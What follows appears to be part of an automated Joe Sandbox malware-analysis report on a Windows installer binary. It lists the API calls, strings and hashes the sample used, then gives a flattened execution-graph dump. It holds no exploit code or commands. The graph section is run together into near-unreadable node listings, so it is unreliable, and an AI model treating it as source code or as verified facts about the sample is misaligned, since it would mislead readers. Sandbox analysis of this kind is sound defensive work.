                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                        • String ID: Version
                                                                                                                                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:3.5%
                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:45
103107 f73fe1 81 API calls __wsopen_s 102996->103107 102998 f11695 103004 f0bed9 8 API calls 102998->103004 103011 f1049d messages 102998->103011 102999 f2014b 8 API calls 102999->103013 103001 f55cdb 103008 f0bed9 8 API calls 103001->103008 103001->103011 103002 f5625a 103106 f73fe1 81 API calls __wsopen_s 103002->103106 103003 f0bed9 8 API calls 103003->103013 103004->103011 103008->103011 103009 f205b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103009->103013 103010 f0bf73 8 API calls 103010->103013 103011->102964 103012 f56115 103104 f73fe1 81 API calls __wsopen_s 103012->103104 103013->102995 103013->102996 103013->102998 103013->102999 103013->103001 103013->103002 103013->103003 103013->103009 103013->103010 103013->103011 103013->103012 103014 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103013->103014 103016 f10aae messages 103013->103016 103032 f11990 103013->103032 103094 f11e50 103013->103094 103014->103013 103105 f73fe1 81 API calls __wsopen_s 103016->103105 103018 f0c3b9 103017->103018 103024 f0c3e1 messages 103017->103024 103019 f0c3c7 103018->103019 103020 f0c3ab 8 API calls 103018->103020 103021 f0c3cd 103019->103021 103022 f0c3ab 8 API calls 103019->103022 103020->103019 103021->103024 103813 f0c7e0 8 API calls messages 103021->103813 103022->103021 103024->102985 103025->102985 103026->102956 103027->102967 103028->102967 103029->102967 103030->102980 103031->102982 103033 f119b6 103032->103033 103034 f11a2e 103032->103034 103036 f119c3 103033->103036 103037 f56b60 103033->103037 103035 f56a4d 103034->103035 103050 f11a3d 103034->103050 103039 f56b54 103035->103039 103040 f56a58 103035->103040 103045 f56b84 103036->103045 103046 f119cd 103036->103046 103114 f885db 206 API calls 2 library calls 103037->103114 103113 f73fe1 81 API calls __wsopen_s 103039->103113 103112 f1b35c 206 API calls 103040->103112 103041 f10340 206 API calls 
103041->103050 103044 f56bb5 103047 f56bc0 103044->103047 103048 f56be2 103044->103048 103045->103044 103049 f56b9c 103045->103049 103055 f0bed9 8 API calls 103046->103055 103093 f119e0 messages 103046->103093 103116 f885db 206 API calls 2 library calls 103047->103116 103117 f860e6 103048->103117 103115 f73fe1 81 API calls __wsopen_s 103049->103115 103050->103041 103051 f56979 103050->103051 103054 f11bb5 103050->103054 103058 f56908 103050->103058 103069 f11ba9 103050->103069 103077 f11af4 103050->103077 103050->103093 103111 f73fe1 81 API calls __wsopen_s 103051->103111 103054->103013 103055->103093 103110 f73fe1 81 API calls __wsopen_s 103058->103110 103059 f56dd9 103064 f56e0f 103059->103064 103215 f881ce 65 API calls 103059->103215 103062 f56c81 103188 f71ad8 8 API calls 103062->103188 103217 f0b4c8 8 API calls 103064->103217 103065 f56db7 103191 f08ec0 103065->103191 103068 f0bed9 8 API calls 103068->103093 103069->103054 103109 f73fe1 81 API calls __wsopen_s 103069->103109 103071 f56ded 103074 f08ec0 52 API calls 103071->103074 103073 f56c08 103124 f7148b 103073->103124 103088 f56df5 _wcslen 103074->103088 103076 f56c93 103189 f0bd07 8 API calls 103076->103189 103077->103069 103108 f11ca0 8 API calls 103077->103108 103081 f11b55 103081->103069 103089 f11b62 messages 103081->103089 103082 f5691d messages 103082->103051 103082->103089 103091 f11a23 messages 103082->103091 103083 f56dbf _wcslen 103083->103059 103214 f0b4c8 8 API calls 103083->103214 103085 f56c9c 103092 f7148b 8 API calls 103085->103092 103088->103064 103216 f0b4c8 8 API calls 103088->103216 103089->103068 103089->103091 103089->103093 103091->103013 103092->103093 103093->103059 103093->103091 103190 f8808f 53 API calls __wsopen_s 103093->103190 103097 f11e6d messages 103094->103097 103095 f12512 103098 f11ff7 messages 103095->103098 103812 f1be08 39 API calls 103095->103812 103097->103095 103097->103098 103100 f57837 103097->103100 103103 f5766b 103097->103103 103810 f1e322 8 API calls 
messages 103097->103810 103098->103013 103100->103098 103811 f2d2d5 39 API calls 103100->103811 103809 f2d2d5 39 API calls 103103->103809 103104->103016 103105->103011 103106->103011 103107->103011 103108->103081 103109->103091 103110->103082 103111->103093 103112->103089 103113->103037 103114->103093 103115->103091 103116->103093 103118 f86101 103117->103118 103123 f56bed 103117->103123 103119 f2017b 8 API calls 103118->103119 103120 f86123 103119->103120 103121 f2014b 8 API calls 103120->103121 103120->103123 103218 f71400 8 API calls 103120->103218 103121->103120 103123->103062 103123->103073 103125 f56c32 103124->103125 103126 f71499 103124->103126 103128 f12b20 103125->103128 103126->103125 103127 f2014b 8 API calls 103126->103127 103127->103125 103129 f12b61 103128->103129 103130 f12fc0 103129->103130 103131 f12b86 103129->103131 103377 f205b2 5 API calls __Init_thread_wait 103130->103377 103133 f12ba0 103131->103133 103134 f57bd8 103131->103134 103219 f13160 103133->103219 103340 f87af9 103134->103340 103136 f12fca 103146 f1300b 103136->103146 103378 f0b329 103136->103378 103139 f57be4 103139->103093 103141 f13160 9 API calls 103142 f12bc6 103141->103142 103143 f12bfc 103142->103143 103142->103146 103145 f57bfd 103143->103145 103152 f12c18 __fread_nolock 103143->103152 103144 f57bed 103144->103093 103388 f73fe1 81 API calls __wsopen_s 103145->103388 103146->103144 103385 f0b4c8 8 API calls 103146->103385 103149 f12fe4 103384 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103149->103384 103150 f13049 103386 f1e6e8 206 API calls 103150->103386 103152->103150 103154 f57c15 103152->103154 103161 f2014b 8 API calls 103152->103161 103162 f2017b 8 API calls 103152->103162 103168 f10340 206 API calls 103152->103168 103169 f12d3f 103152->103169 103172 f57c59 103152->103172 103177 f12dd7 messages 103152->103177 103389 f73fe1 81 API calls __wsopen_s 103154->103389 103156 f57c78 103391 f861a2 53 API calls _wcslen 103156->103391 103157 f12d4c 103158 
f13160 9 API calls 103157->103158 103160 f12d59 103158->103160 103164 f13160 9 API calls 103160->103164 103160->103177 103161->103152 103162->103152 103163 f13082 103387 f1fe39 8 API calls 103163->103387 103174 f12d73 103164->103174 103167 f12f2d 103167->103093 103168->103152 103169->103156 103169->103157 103170 f13160 9 API calls 103170->103177 103390 f73fe1 81 API calls __wsopen_s 103172->103390 103173 f12e8b messages 103173->103167 103376 f1e322 8 API calls messages 103173->103376 103176 f0bed9 8 API calls 103174->103176 103174->103177 103176->103177 103177->103163 103177->103170 103177->103173 103229 f89ffc 103177->103229 103232 f8a6aa 103177->103232 103240 f8ee2f 103177->103240 103267 f8a9ac 103177->103267 103275 f80fb8 103177->103275 103300 f7664c 103177->103300 103307 f8a5b2 103177->103307 103313 f89fe8 103177->103313 103316 f1ac3e 103177->103316 103335 f8ad47 103177->103335 103392 f73fe1 81 API calls __wsopen_s 103177->103392 103188->103076 103189->103085 103190->103065 103192 f08ed2 103191->103192 103193 f08ed5 103191->103193 103192->103083 103194 f08f0b 103193->103194 103195 f08edd 103193->103195 103197 f46b1f 103194->103197 103200 f08f1d 103194->103200 103205 f46a38 103194->103205 103805 f25536 26 API calls 103195->103805 103808 f254f3 26 API calls 103197->103808 103198 f08eed 103204 f2014b 8 API calls 103198->103204 103806 f1fe6f 51 API calls 103200->103806 103201 f46b37 103201->103201 103206 f08ef7 103204->103206 103208 f2017b 8 API calls 103205->103208 103213 f46ab1 103205->103213 103207 f0b329 8 API calls 103206->103207 103207->103192 103209 f46a81 103208->103209 103210 f2014b 8 API calls 103209->103210 103211 f46aa8 103210->103211 103212 f0b329 8 API calls 103211->103212 103212->103213 103807 f1fe6f 51 API calls 103213->103807 103214->103059 103215->103071 103216->103064 103217->103091 103218->103120 103220 f131a1 103219->103220 103221 f1317d 103219->103221 103393 f205b2 5 API calls __Init_thread_wait 103220->103393 103228 f12bb0 103221->103228 
